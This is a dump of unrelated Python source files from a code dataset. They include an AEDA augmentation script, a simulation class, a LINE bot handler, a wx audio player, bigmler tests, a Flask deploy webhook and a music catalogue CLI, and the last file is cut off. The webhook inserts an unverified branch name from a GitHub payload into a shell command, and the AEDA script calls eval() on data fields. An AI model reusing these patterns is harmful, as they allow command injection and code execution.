sentence.replace(HASH_VALUE_SUB, word_s, 1)\n \n obj_index.append(str(sentence.find(HASH_VALUE_OBJ)))\n obj_index.append(str(sentence.find(HASH_VALUE_OBJ) + len_o - 1))\n sentence = sentence.replace(HASH_VALUE_OBJ, word_o, 1)\n \n entity_sub = \"{'word': '\" + word_s + \"', 'start_idx': \" + sub_index[0] + \", 'end_idx': \" + sub_index[1] + \", 'type': '\" + type_s + \"'}\"\n entity_obj = \"{'word': '\" + word_o + \"', 'start_idx': \" + obj_index[0] + \", 'end_idx': \" + obj_index[1] + \", 'type': '\" + type_o + \"'}\"\n\n return sentence, entity_sub, entity_obj\n \n\ndef insert_punc_and_change_index(data_row):\n '''\n encode_words, insert_punctuation, change_index, merge to pd.Series\n '''\n word_s, start_s, end_s, type_s = list(eval(data_row[\"subject_entity\"]).values())\n word_o, start_o, end_o, type_o = list(eval(data_row[\"object_entity\"]).values())\n len_s = len(word_s)\n len_o = len(word_o)\n\n encoded_sentence = encode_words(data_row['sentence'], start_s, end_s, start_o, end_o) \n new_sentence = insert_punctuation(encoded_sentence) \n new_sentence, entity_sub, entity_obj = change_index(new_sentence, word_s, word_o, len_s, len_o, type_s, type_o) \n \n data_row['sentence'] = new_sentence\n data_row['subject_entity'] = entity_sub\n data_row['object_entity'] = entity_obj\n\n return data_row\n\n\ndef main(data_train, data_val, aug):\n '''\n 주어진 dataframe에 AEDA 데이터 증강을 적용하기 위한 함수\n '''\n aug_train = pd.DataFrame()\n aug_val = pd.DataFrame()\n\n for _ in range(aug):\n train_new = data_train.apply(lambda x: insert_punc_and_change_index(x), axis=1) \n val_new = data_val.apply(lambda x: insert_punc_and_change_index(x), axis=1) \n\n aug_train = pd.concat([aug_train, train_new], axis=0)\n aug_val = pd.concat([aug_val, val_new], axis=0)\n\n aug_train.reset_index(inplace=True, drop=True)\n aug_val.reset_index(inplace=True, drop=True)\n\n return aug_train, aug_val\n\n\ndef iterate_main(path):\n '''\n split train, val set and duplicate if needed\n '''\n orig_df = pd.read_csv(path)\n\n for aug in tqdm(NUM_AUGS):\n df_train, df_val = train_test_split(orig_df, test_size=0.2, random_state=42, stratify=orig_df[\"label\"])\n new_df_train, new_df_val = main(df_train, df_val, aug)\n final_df_train = pd.concat([df_train, new_df_train], axis=0)\n final_df_val = pd.concat([df_val, new_df_val], axis=0)\n\n os.makedirs(f\"{DATASET_PATH}/aeda_{aug}_dataset\", exist_ok=True)\n os.makedirs(f\"{DATASET_PATH}/aeda_{aug}_dataset/train\", exist_ok=True)\n \n final_df_train.to_csv(f\"{DATASET_PATH}/aeda_{aug}_dataset/train/train.csv\", header=True, index=False)\n final_df_val.to_csv(f\"{DATASET_PATH}/aeda_{aug}_dataset/train/valid.csv\", header=True, index=False)\n\n\nif __name__ == \"__main__\":\n iterate_main(TRAIN_PATH)\n","sub_path":"data_augmentation/aeda_val_split.py","file_name":"aeda_val_split.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"279223284","text":"# Linux-specific implementation (specifically >= 2.6.21), although the clock_getxxx are POSIX.\n# See more with man clock_gettime and man 7 time\n\nimport ctypes\nfrom ctypes import CDLL, Structure, c_int64, c_int32, c_long, byref\nfrom sysconfig import get_config_var\n\n__all__ = ['monotonic_clock', 'time_to_monotonic', 'time_from_monotonic']\n\nCLOCK_REALTIME = 0\nCLOCK_MONOTONIC = 1\nCLOCK_MONOTONIC_RAW = 4\n\n_rtlib = None\n_time_t = None\n_timespec_t = None\n\nSEC_IN_NSEC = 10**9\n\n\ndef _check_ctypes_errno():\n # Python 2.7.2+ (default, Oct 4 2011, 20:06:09)\n # [GCC 4.6.1] on linux2\n # >>> import ctypes\n # >>> ctypes.get_errno\n # Traceback (most recent call last):\n # File \"\", line 1, in \n # AttributeError: 'module' object has no attribute 'get_errno'\n try:\n get_errno = ctypes.get_errno\n except AttributeError:\n raise NotImplementedError(\"system doesn't have ctypes.get_errno, happens on an old ubuntu\")\n\n\ndef _init_library():\n global _rtlib, _time_t, _timespec_t\n\n _time_t = c_int64 if get_config_var(\"SIZEOF_TIME_T\") == 8 else c_int32\n\n class timespec_t(Structure):\n _fields_ = [(\"tv_sec\", _time_t), (\"tv_nsec\", c_long)]\n\n _timespec_t = timespec_t\n\n _check_ctypes_errno()\n\n try:\n _rtlib = CDLL(\"librt.so\")\n except OSError:\n raise NotImplementedError(\"system doesn't support high resolution timers (librt.so not found)\")\n\n # First we need to see that the clock we want is supported.\n # See man 7 time: High-Resolution Timers\n if _rtlib.clock_getres(CLOCK_MONOTONIC_RAW, 0) != 0:\n raise NotImplementedError(\"system doesn't support high resolution timers or monotonic clock\")\n\n\ndef monotonic_clock():\n if not _rtlib:\n _init_library()\n\n timespec = _timespec_t()\n if _rtlib.clock_gettime(CLOCK_MONOTONIC_RAW, byref(timespec)) != 0:\n raise OSError(ctypes.get_errno(), \"clock_gettime failed\")\n\n return timespec.tv_nsec + (timespec.tv_sec * SEC_IN_NSEC)\n\n\ndef time_to_monotonic(time):\n return int(time * SEC_IN_NSEC)\n\n\ndef time_from_monotonic(clock):\n return clock / float(SEC_IN_NSEC)\n","sub_path":"src/infi/monotonic_time/linux.py","file_name":"linux.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"441708157","text":"# 做为 Apple Store App 独立开发者,你要搞限时促销,为你的应用生成激活码(或者优惠券),使用 Python 如何生 # 成 200\n# 个激活码(或者优惠券)?\n\nimport uuid\n\n\ndef create_code(num=200):\n codes = []\n while True:\n code = str(uuid.uuid1()).replace('-', '')\n if not code in codes:\n codes.append(code)\n if len(codes) is num:\n break\n return codes\n\n\nif __name__ == '__main__':\n create_code()\n","sub_path":"python_daily/test_0002/python_0002.py","file_name":"python_0002.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"115950794","text":"import math\nfrom src.simSettings import Settings\nimport random\nfrom src.updatable import Updatable\nimport json\n\n\"\"\"\noccupations: producer, distributor\n producer:\n distributor:\n\n\n\"\"\"\n# the default state of new Pops\ndefaultState = {\n 'occupation': 'producer',\n 'demands': {},\n 'supplies': {},\n 'money': 0,\n 'producing': '',\n}\nmarketInfo = {}\nwith open(\"src/marketStart.json\") as f:\n marketInfo = json.load(f)\n# state[\"demands\"] gets filled by all product's \"defaultDemand\"\n# supplies gets filled with 0\nfilledProducing = False\nfor key in marketInfo:\n if not filledProducing:\n defaultState[\"producing\"] = key\n filledProducing = True\n defaultState[\"demands\"][key] = marketInfo[key][\"defaultDemand\"]\n defaultState[\"supplies\"][key] = 0\n\nclass Pop(Updatable):\n def __init__(self, popSize: int):\n super().__init__()\n self.popSize = popSize\n self.state = defaultState\n\n # Override\n def update(self, sim):\n if self.state['occupation'] == \"producer\":\n # use up supplies bought last turn\n self.useSupplies(sim)\n # adjust what's being produced, then produce things\n self.adjustProduction(sim)\n self.produceItems(sim)\n # sell things\n self.itemsToMarket(sim)\n # buy new items\n self.buyNeeds(sim)\n # grow pop\n self.popSize = self.popSize + (self.popSize * Settings.popGrowthRate)\n\n def useSupplies(self, sim):\n for key in self.state[\"demands\"]:\n self.state[\"supplies\"][key] -= self.state[\"demands\"][key]\n if self.state[\"supplies\"][key] < 0:\n # health/happiness effects\n pass\n self.state[\"supplies\"][key] = self.state[\"supplies\"][key] if self.state[\"supplies\"][key] > 0 else 0\n\n def adjustProduction(self, sim):\n # to prevent overcompensation within single ticks, this will only happen occasionally\n if (random.uniform(0,1) <= Settings.productionSwapLikelyhood):\n expectedReturns = {}\n for key in sim.market.products:\n expectedReturns[key] = sim.market.valueOf( (key, self.amountProduced(sim, key) ))\n\n bestChoice = \"\"\n for product in expectedReturns:\n if (bestChoice == \"\"):\n bestChoice = product\n else:\n if expectedReturns[bestChoice] < expectedReturns[key]:\n bestChoice = product\n self.state['producing'] = bestChoice\n\n # amount pop could produce of this product\n def amountProduced(self, sim, productName: str):\n return self.popSize * sim.market.getProduct(productName)[\"production\"]\n\n # amount pop will need based on its size and demands\n def amountNeeded(self, sim, productName: str):\n return self.popSize * self.state[\"demands\"][productName]\n\n def produceItems(self, sim):\n product = self.state[\"producing\"]\n amount = self.amountProduced(sim, product)\n self.state[\"supplies\"][product] += amount\n\n # put the items on the market\n def itemsToMarket(self, sim):\n for product in self.state[\"supplies\"]:\n if self.state[\"supplies\"][product] > 0:\n # sell everything\n self.sellProduct(sim, product, self.state[\"supplies\"][product])\n\n def buyNeeds(self, sim):\n for product in self.state[\"demands\"]:\n if self.state[\"demands\"][product] > 0:\n self.buyProduct(sim, product, self.amountNeeded(sim, product))\n\n def sellProduct(self, sim, productName: str, amount):\n productSellOrder = (self, productName, amount)\n #sim.market.addItems(productSellOrder)\n #self.state[\"supplies\"][productName] -= amount\n #self.state[\"money\"] += sim.market.valueOf(productSellOrder)\n sim.market.addSellOrder(productSellOrder)\n\n def buyProduct(self, sim, productName: str, amount):\n productBuyOrder = (self, productName, amount)\n #sim.market.removeItems(productBuyOrder)\n #self.state[\"supplies\"][productName] += amount\n #self.state[\"money\"] -= sim.market.valueOf(productBuyOrder)\n sim.market.addBuyOrder(productBuyOrder)\n\n def getWeight(self):\n return self.popSize","sub_path":"src/pop.py","file_name":"pop.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"649027383","text":"from UserData import UserData\n\nfrom linebot.models import (\n MessageEvent, TextMessage, TextSendMessage,\n SourceUser, SourceGroup, SourceRoom,\n TemplateSendMessage, ConfirmTemplate, MessageAction,\n PostbackAction,\n)\n\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\n\n\"\"\"\nLine beaconについての設定やコンフィグはこちらでやっています\nuser_data.json_data['user_line_beacon'] {0 : 未設定, 1 : On, 2: Off}\n\"\"\"\nclass BeaconWhisperEvent:\n\n def __init__(\n self,\n line_bot_api,\n userData):\n self.__user_data = userData\n self.__line_bot_api = line_bot_api\n\n def activation_msg(self, event):\n # Lineビーコンが接続された場合、もし0:未設定なら設定プロセスに移行する\n self.__user_data.load()\n if self.__user_data.json_data['use_line_beacon'] is 0:\n confirm_template = ConfirmTemplate(text=\"LINE beacon が接続されたようです。Beacon Ecoを使用しますか?\\nこれを用いることでスマホがビーコンから遠くにあるときはセンサを省エネ化し、センサ寿命を延ばすことができます。\\nbeacon と話しかけると設定を変更できます。\", actions=[\n PostbackAction(label='はい', data='set_beacon_on', displayText='はい!'),\n PostbackAction(label='いいえ', data='set_beacon_off', displayText='いいえ'),\n ])\n template_message = TemplateSendMessage(\n alt_text='Confirm alt text', template=confirm_template)\n self.__line_bot_api.reply_message(event.reply_token, template_message)\n\n\n def set_beacon(self, event):\n # ビーコンのOnとOffを変更する\n react = event.postback.data\n if react == 'set_beacon_on':\n self.__user_data.set_use_line_beacon(1)\n self.__line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(\n text='Beacon EcoをONに設定しました'\n )\n )\n elif react == 'set_beacon_off':\n self.__user_data.set_use_line_beacon(2)\n self.__line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(\n text='Beacon EcoをOFFに設定しました'\n )\n )\n else:\n pass\n\n # beaconを使うかどうかを手動で設定する\n def config_beacon_msg(self, event):\n confirm_template = ConfirmTemplate(text=\"LINE beacon Ecoの設定を行います。Beacon Ecoを使用しますか?\\nこれを用いることでスマホがビーコンから遠くにあるときはセンサを省エネ化し、センサ寿命を延ばすことができます。\\nbeacon と話しかけると設定を変更できます。\", actions=[\n PostbackAction(label='はい', data='set_beacon_on', displayText='はい'),\n PostbackAction(label='いいえ', data='set_beacon_off', displayText='いいえ'),\n ])\n template_message = TemplateSendMessage(\n alt_text='Confirm alt text', template=confirm_template)\n self.__line_bot_api.reply_message(event.reply_token, template_message)\n\n def readBeaconConfig(self):\n if self.__user_data.json_data['use_line_beacon'] == 1:\n return True\n else:\n return False","sub_path":"whisper/beaconWhisperEvent.py","file_name":"beaconWhisperEvent.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"607508437","text":"import wx\nfrom wx.lib.filebrowsebutton import FileBrowseButton\nimport yaml\nimport time\nimport os\nimport threading\n\nclass AudioPlayer(threading.Thread):\n \"\"\"wx.Sound().Play segfaults when run from a thread, so we're punting;\n just call run directly.\"\"\"\n def __init__(self, frame, files):\n threading.Thread.__init__(self)\n self.parent = frame\n self.files = files\n\n def run(self):\n \"\"\"Loop over each file/directive and play back.\"\"\"\n for filename in self.files:\n if filename.lower().startswith(\"pause \"):\n secs = float(filename.split(\" \")[1])\n self.parent.SetStatusText(\"Playing: %s\" % filename)\n time.sleep(secs)\n continue\n elif filename.lower().startswith(\"concat \"):\n AudioPlayer(self.parent, self.parent.data[filename.split(\" \", 1)[1]]).run()\n continue\n\n if not os.path.exists(filename):\n filename = os.path.join(os.path.dirname(self.parent.fbb.GetValue()), filename)\n \n self.parent.SetStatusText(\"Playing: %s\" % filename)\n \n sound = wx.Sound(filename)\n if not os.path.exists(filename):\n self.parent.SetStatusText(\"File not found: %s\" % filename)\n return\n elif sound.IsOk():\n sound.Play(wx.SOUND_SYNC)\n else:\n wx.MessageBox(\"Invalid sound file: \" % filename, \"Error\")\n return\n self.parent.SetStatusText(\"Done.\")\n \n\nclass MyFrame(wx.Frame):\n def __init__(self):\n wx.Frame.__init__(self, None, title=\"Audio Lab\",size=(800,100))\n p = wx.Panel(self)\n\n self.fbb = FileBrowseButton(p,labelText=\"Select audio descriptor file.\",fileMask=\"*.yaml\", changeCallback=self.OnFileSelect)\n btn = wx.Button(p, -1, \"Play\")\n self.Bind(wx.EVT_BUTTON, self.OnPlaySound, btn)\n self.play = btn\n self.choices = wx.Choice(p)\n self.data = {}\n \n sizer = wx.BoxSizer(wx.HORIZONTAL)\n sizer.Add(self.fbb, 1, wx.ALIGN_CENTER_VERTICAL)\n sizer.Add(self.choices, 0, wx.ALIGN_CENTER_VERTICAL)\n sizer.Add(btn, 0, wx.ALIGN_CENTER_VERTICAL)\n border = wx.BoxSizer(wx.VERTICAL)\n border.Add(sizer, 0, wx.EXPAND|wx.ALL, 15)\n p.SetSizer(border)\n self.CreateStatusBar()\n\n def OnPlaySound(self, evt):\n self.data = self._reloadData()\n data = self.data.get(self.choices.GetStringSelection())\n if not data:\n return\n\n player = AudioPlayer(self, data)\n player.run()\n\n def OnFileSelect(self, evt):\n self.data = self._reloadData()\n self.choices.Clear()\n for k in self.data.keys():\n self.choices.Append(k)\n self.choices.SetSelection(0)\n\n def _reloadData(self):\n filename = self.fbb.GetValue()\n return yaml.safe_load(open(filename))\n \n\n \napp = wx.PySimpleApp()\nfrm = MyFrame()\nfrm.Show()\napp.MainLoop()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"539722194","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2020 BigML\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nimport os\nimport time\nimport json\nfrom bigmler.tests.world import world\nfrom subprocess import check_call, CalledProcessError\nfrom bigml.api import check_resource\nfrom bigml.io import UnicodeReader\nfrom bigmler.checkpoint import file_number_of_lines\nfrom bigmler.utils import storage_file_name, open_mode\nfrom bigmler.tests.common_steps import check_debug\nfrom nose.tools import ok_, assert_equal, assert_not_equal\n\n\ndef shell_execute(command, output, test=None, options=None,\n test_rows=None, project=True):\n \"\"\"Excute bigmler command in shell\n\n \"\"\"\n command = check_debug(command, project=project)\n world.directory = os.path.dirname(output)\n world.folders.append(world.directory)\n try:\n retcode = check_call(command, shell=True)\n if retcode < 0:\n assert False\n else:\n if test is not None:\n world.test_lines = file_number_of_lines(test)\n if options is None or \\\n options.find('--projection-header') == -1:\n # test file has headers in it, so first line must be ignored\n world.test_lines -= 1\n elif test_rows is not None:\n world.test_lines = test_rows\n if options is not None and \\\n options.find('--projection-header') > -1:\n world.test_lines += 1\n elif options is not None and \\\n options.find('--projection-header') > -1:\n world.test_lines += 1\n world.output = output\n except (OSError, CalledProcessError, IOError) as exc:\n assert False, str(exc)\n\n#@step(r'I create BigML external connection using \"(.*)\", \"(.*)\", \"(.*)\", \"(.*)\", \"(.*)\", \"(.*)\" and \"(.*)\" and log files in \"(.*)\"$')\ndef i_create_external_connector(step, name=None, source=None, host=None,\n port=None, database=None, user=None,\n password=None ,output_dir=None):\n ok_(name is not None and source is not None and host is not None and\n port is not None and database is not None and user is not None and\n password is not None and output_dir is not None)\n command = (\"bigmler connector --name \\\"\" + name +\n \"\\\" --host \" + host +\n \" --port \" + port +\n \" --database \" + database +\n \" --user \" + user +\n \" --password \" + password +\n \" --engine \" + source +\n \" --store --output-dir \" + output_dir)\n shell_execute(command, \"%s/x\" % output_dir)\n\n\n#@step(r'I check that the external connection is ready')\ndef i_check_external_connector(step):\n connector_file = \"%s%sexternal_connector\" % (world.directory, os.sep)\n try:\n connector_file = open(connector_file, \"r\")\n connector = check_resource(connector_file.readline().strip(),\n world.api.get_external_connector)\n world.external_connectors.append(connector['resource'])\n world.external_connector = connector\n connector_file.close()\n except Exception as exc:\n assert False, str(exc)\n\n\n\n#@step(r'I update the external connection to \"(.*)\" and logs to \"(.*)\"$')\ndef i_update_external_connector(step, name=None, output_dir=None):\n ok_(name is not None and output_dir is not None)\n command = (\"bigmler connector --external-connector \" +\n world.external_connector[\"resource\"] +\n \" --name \\\"\" + name + \"\\\"\" + \" --output-dir \" + output_dir)\n shell_execute(command, \"%s/x\" % output_dir)\n\n\n#@step(r'I check that the external connection is ready')\ndef i_check_external_connector_name(step, name=None):\n ec_name = world.external_connector.get( \\\n \"object\", world.external_connector).get(\"name\")\n assert_equal(ec_name, name)\n","sub_path":"bigmler/tests/external_connector_steps.py","file_name":"external_connector_steps.py","file_ext":"py","file_size_in_byte":4451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"263425594","text":"import re\nimport datetime\nimport json\nimport subprocess\nfrom flask import request\nfrom app import aws_ext, dbm_ext, infra_ext, docker_ext\nfrom app.tasks import run_command, exec_commands, docker_message, git_message, send_socket_message\n\nfrom . import webhook\n\n'''\n{\n \"repo_full\" : \"e-gob/traspaso-l54\",\n \"branch\" : {\n \"master\" : {\n \"path\" : \"/storage/APP_GENERAL/www/docker/traspaso\"\n },\n \"devel\" : {\n \"path\" : \"/storage/APP_GENERAL/www/docker/traspaso-devel\"\n }\n },\n \"last_update\" : ISODate(\"2017-10-19T19:27:56.983+0000\")\n}\n'''\n\n\n@webhook.route('/commit', methods=['POST'])\ndef git_commit():\n '''\n Function: git commit\n Summary: Se recibe el JSON de GitHub cuando se hace commit\n Examples: POST HTTP/1.1 { \"json\":\"json\"}\n Attributes:\n Returns:\n '''\n #try:\n # Obtenemos respuesta del commit desde GIT\n git_json = json.loads(request.data)\n #if git_json['zen']:\n # return \"True\"\n # Obtenemos Nombre Repositorio\n repo_full = git_json['repository']['full_name']\n # Obtenemos Branch (\"ref\":\"refs/heads/devel\")\n branch = git_json['ref'].split('/')[2]\n # Deploy\n path = dbm_ext.obtain_path_deploy_code(repo_full, branch)\n # Celery tasks\n command = f'cd {path} && git fetch --all && git reset --hard origin/{branch}'\n print(command)\n task_command = send_socket_message.apply_async(args=[command])\n # task_command = run_command.apply_async(args=[command])\n while task_command.status == 'PENDING':\n pass\n task_id = container_name = None\n run_commands = dbm_ext.obtain_deploy_image(repo_full)\n if run_commands:\n deploy_image = run_commands['image_deploy']\n commands = run_commands['commands']\n task = exec_commands.apply_async(args=[deploy_image, commands, path])\n task_id = task.id\n\n restart_docker = dbm_ext.obtain_container_name(repo_full)\n if restart_docker:\n container_name = restart_docker['container_name']\n\n auto_scaling_grp = [re.findall('/storage/(.*?)/www', path, re.DOTALL)[0]]\n payload = {'message': 'git', 'repo_full': repo_full, 'branch': branch, 'storage_path': path, 'container_name': container_name}\n print(payload)\n git_message.apply_async(args=[auto_scaling_grp, payload, task_id])\n # Actualizamos fecha de modificacion del repo\n dbm_ext.update_github_deploy(repo_full, datetime.datetime.now())\n # Logueamos fecha del cambio en la BD\n commit = {\"repo_full\": repo_full, \"branch\": branch, \"datetime\": datetime.datetime.now()}\n dbm_ext.log_commit_github(commit)\n return \"True\"\n #except:\n # return \"True\"\n\n\n@webhook.route('/commit_docker', methods=['POST'])\ndef docker_commit():\n '''\n Function: docker commit\n Summary: Se recibe el JSON de DockerHub cuando se hace commit\n Examples: POST HTTP/1.1 { \"json\":\"json\"}\n Attributes:\n Returns:\n '''\n tag = json.loads(request.data)['push_data']['tag']\n pusher = json.loads(request.data)['push_data']['pusher']\n repo_name = json.loads(request.data)['repository']['repo_name']\n # Mantenemos lista de Imagenes\n dbm_ext.update_docker_image_info(repo_name, tag, datetime.datetime.now(), pusher)\n # Actualizamos fecha del cambio en la BD\n commit = {\"tag\": tag, \"pusher\": pusher, \"datetime\": datetime.datetime.now(), \"repo_name\": repo_name}\n dbm_ext.log_commit_docker(commit)\n auto_scaling_grp = dbm_ext.obtain_auto_scaling_grp(repo_name)\n payload = {'message': 'docker', 'repo_image': repo_name, \"tag\": tag}\n if auto_scaling_grp:\n docker_message.apply_async(args=[auto_scaling_grp, payload])\n return \"True\"\n\n\n@webhook.route('/obtain-docker-tag', methods=['GET'])\ndef obtain_tag_image_docker():\n '''\n Function: obtain tag image\n Summary: Se recibe el JSON de GitHub cuando se hace commit\n Examples: POST HTTP/1.1 { \"json\":\"json\"}\n Attributes:\n Returns:\n '''\n try:\n repo = str(request.args.get('repo'))\n tag = dbm_ext.obtain_last_tag_docker_image(repo)\n return str(tag)\n except:\n return \"ERROR\"\n\n\n@webhook.route('/obtain-last-update-github', methods=['GET'])\ndef obtain_last_github_commit():\n '''\n Function: obtain tag image\n Summary: Se recibe el JSON de GitHub cuando se hace commit\n Examples: POST HTTP/1.1 { \"json\":\"json\"}\n Attributes:\n Returns:\n '''\n try:\n repo = str(request.args.get('repo'))\n timestamp = dbm_ext.obtain_last_github_commit(repo)\n import time\n return str(int(time.mktime(timestamp.timetuple())))\n except:\n return \"ERROR\"","sub_path":"app/webhook/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"467157492","text":"from selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import (NoSuchElementException,\n\t\tStaleElementReferenceException)\n\nclass UploadFileForm():\n\n\tdef __init__(self, driver):\n\t\tself.driver = driver\n\n\tdef load(self):\n\t\tself.container = self.driver.find_element_by_class_name('modal-content')\n\t\tbuttons = self.container.find_elements_by_tag_name('button')\n\n\t\tself.close_button = buttons[0]\n\n\t\tupload_file_div = self.container.find_element_by_class_name('dropzone_div')\n\n\t\tself.continue_button = buttons[1]\n\t\tself.cancel_button = buttons[2]\n\t\t\n\t\treturn self.validate()\n\n\tdef validate(self):\n\t\tfailures = []\n\t\tif self.continue_button.text != 'CONTINUE':\n\t\t\tfailures.append('NewAccoutPopUpForm: Unexpected continue button text: \"' + self.continue_button.text + '\"')\n\t\tif self.cancel_button.text != 'CANCEL':\n\t\t\tfailures.append('NewAccountPopUpForm: Unexpected cancel button text: \"' + self.cancel_button.text + '\"')\n\t\tif len(failures) > 0:\n\t\t\tfor failure in failures:\n\t\t\t\tprint(failure)\n\t\t\treturn False\n\t\t\t# raise NoSuchElementException('Failed to load PopUpForm')\n\t\treturn True\n\n\tdef confirm(self, action='continue'):\n\t\tif action == 'continue':\n\t\t\tself.continue_button.click()\n\t\telse: \n\t\t\tself.cancel_button.click()\n\t\treturn True\n\n","sub_path":"Components/uploadFileForm.py","file_name":"uploadFileForm.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"328523790","text":"import random\n\n\ndef findalbum(arg1, arg2):\n # searching for an album using arg1 in a place defined in arg2\n if str(arg1).lower() in str(arg2).lower():\n print(line[0][0], '-', line[0][1])\n\n\ndef findartist(arg1, arg2):\n # searching for artist using arg1 in a place defined in arg2\n if str(arg1).lower() in str(arg2).lower():\n print(line[0][0], '(' + line[0][1] + ')')\n\n\nwith open('music.csv', 'r') as file1:\n music1 = file1.readlines()\n print(music1)\nmusic = []\nfor line in music1:\n line = tuple(line.split(' | '))\n name = (line[0], line[1])\n information = (int(line[2]), line[3], line[4])\n line = (name, information)\n music.append(line)\n #artist - line[0][0]\n #album - line[0][1]\n #year - line[1][0]\n #genre - line[1][1]\n #length - line[1][2]\nprint(music) # developers option\nrepeatmain = 1\nwhile repeatmain == 1:\n option = input(\"\"\"\\nWelcome in the CoolMusic! Choose the action:\n 1) Add new album\n 2) Find albums by artist\n 3) Find albums by year\n 4) Find musician by album\n 5) Find albums by letter(s)\n 6) Find albums by genre\n 7) Calculate the age of all albums\n 8) Choose a random album by genre\n 9) Show the amount of albums by an artist *\n 10) Find the longest-time album *\n 0) Exit\\n\"\"\")\n if option == '1':\n artist = input(\"Add artist's name: \")\n album = input(\"Add the name of the album: \")\n\n again = 0\n while again == 0:\n try:\n year = int(input(\"Enter album's release year: \"))\n again = 1\n except BaseException:\n print(\"Thats not a correct format, try again: \")\n\n genre = input(\"Type genre of the album: \")\n length = input(\"Enter lenght of the album [mm:ss]: \")\n newline = ((artist, album), (year, genre, length))\n music.append(newline)\n print(music)\n\n with open('music.csv', 'w') as file2:\n for line in music:\n file2.write(line[0][0] +\n ' | ' +\n line[0][1] +\n ' | ' +\n str(line[1][0]) +\n ' | ' +\n line[1][1] +\n ' | ' +\n line[1][2])\n\n elif option == '2':\n artist = input('Enter artist/band name: ')\n for line in music:\n findalbum(artist, line[0][0])\n elif option == '3':\n year = input('Enter year of release: ')\n for line in music:\n findalbum(year, line[1][0])\n elif option == '4':\n album = input('Enter name (or a part) of an album: ')\n for line in music:\n findartist(album, line[0][1])\n elif option == '5':\n letters = input('Enter letter(s): ')\n for line in music:\n findalbum(letters, line[0][1])\n elif option == '6':\n genre = input('Enter genre: ')\n for line in music:\n findalbum(genre, line[1][1])\n elif option == '7':\n age = 0\n for line in music:\n age1 = 2017 - line[1][0]\n age += age1\n print('The sum of albums age is: ' + str(age))\n elif option == '8':\n genre = input('Choose genre of album: ')\n genrealbums = []\n for line in music:\n if genre.lower() in line[1][1].lower():\n genrealbums.append(line)\n randomline = random.choice(genrealbums)\n print(str(randomline[0][1]), '-', str(randomline[1][1]))\n elif option == '9':\n artist = input('Enter artist/band name: ')\n i = 0\n for line in music:\n if artist.lower() == line[0][0].lower():\n i += 1\n if i > 0:\n print('Numer of artists albums in database: ' + str(i))\n else:\n print('There is no such artist in our database')\n elif option == '10':\n longest = 0\n for line in music:\n length = line[1][2].rstrip()\n length = int(length.replace(':', ''))\n if length > longest:\n longest = length\n longestalbum = line[0][1]\n print('Longest album in our database is ' + str(longestalbum))\n elif option == '0':\n repeatmain = 0\n else:\n print('Wrong pick, try again!!')\n","sub_path":"music_compiler.py","file_name":"music_compiler.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"425574118","text":"import os, json, boto, requests, zipfile, re, pdb\nfrom boto.s3.key import Key\nfrom flask import Flask, flash, request, render_template, url_for, redirect, make_response, send_from_directory, flash\nfrom werkzeug import secure_filename\n\nfrom flask.ext.heroku import Heroku\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom pykml import parser\n\n#----------------------------------------\n# initialization\n#----------------------------------------\n\napp = Flask(__name__)\nheroku = Heroku(app)\ndb = SQLAlchemy(app)\n\napp.config.update(\n DEBUG = True,\n # For local development, put in your own user name\n # SQLALCHEMY_DATABASE_URI = 'postgres://hackyourcity@localhost/planit'\n)\n\napp.config.setdefault('AWS_ACCESS_KEY_ID', os.environ.get('AWS_ACCESS_KEY_ID'))\napp.config.setdefault('AWS_SECRET_ACCESS_KEY', os.environ.get('AWS_SECRET_ACCESS_KEY'))\napp.config.setdefault('S3_BUCKET_NAME', os.environ.get('S3_BUCKET_NAME'))\n\n\n#----------------------------------------\n# models\n#----------------------------------------\n\nclass ThreeDeeModel(db.Model):\n\tid = db.Column(db.Integer, primary_key=True)\n\tname = db.Column(db.Unicode, unique=True)\n\tdescription = db.Column(db.Unicode)\n\tlocalpath = db.Column(db.Unicode)\n\tlatitude = db.Column(db.Unicode)\n\tlongitude = db.Column(db.Unicode)\n\ts3_url = db.Column(db.Unicode)\n\n\tdef __init__(self, name, description, localpath):\n\t\tself.name = name\n\t\tself.description = description\n\t\tself.localpath = localpath\n\n\tdef open_model(self):\n\t\tz = zipfile.ZipFile(self.localpath)\n\t\tz.extractall()\n\n\tdef get_lat_lon_from_model(self):\n\t\tkml = open('/tmp/doc.kml','r').read()\n\t\tmatch = re.search('(.*)', kml)\n\t\tself.latitude = match.group(1)\n\t\tmatch = re.search('(.*)', kml)\n\t\tself.longitude = match.group(1)\n\n\tdef upload_to_s3(self):\n\t\tconn = 